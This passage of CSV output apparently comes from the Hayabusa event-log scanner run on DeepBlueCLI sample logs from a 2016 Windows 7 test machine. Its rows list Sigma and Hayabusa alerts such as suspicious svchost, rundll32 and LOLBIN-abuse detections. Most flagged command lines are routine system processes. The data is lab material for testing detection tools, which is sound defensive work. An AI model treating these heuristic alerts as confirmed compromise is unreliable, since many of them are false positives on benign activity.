15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:14:10.202 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:22:14.624 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:22:14.624 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:29:28.865 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:29:28.865 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:39:37.215 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:42:43.762 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:36.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 16:52:58.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 
16:52:58.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.375 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.500 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.734 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.734 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.171 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:08.922 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 
16:53:08.922 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:09.735 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:09.735 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:10.454 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:19.313 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.297 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.329 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.360 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.375 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal 
Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.407 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.422 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.080 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.080 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.471 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:25.736 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:34.966 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 
16:58:34.997 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:35.013 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:06:20.341 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:06:20.341 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:14:40.529 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:34:07.747 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:34:07.763 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: 
C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:35:08.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.229 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.229 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.244 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.656 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:09.918 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:09.918 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.468 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.499 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.499 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 
17:44:08.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.609 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.765 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.765 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.859 
+00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:09.484 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:09.499 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:07:37.968 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:07:37.968 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:46:19.937 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:46:20.000 +00:00,IE10Win7,6005,info,,Event Log Service 
Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 18:57:20.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:57:21.015 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:00:18.548 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:05:34.164 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:05:34.195 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:29.037 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:30.037 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160818195530.log C:\Windows\Logs\CBS\CbsPersist_20160818195530.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:33.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:55:49.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:55:49.421 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.421 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.531 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.531 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.562 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.562 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.734 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.734 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.750 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:49.765 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 
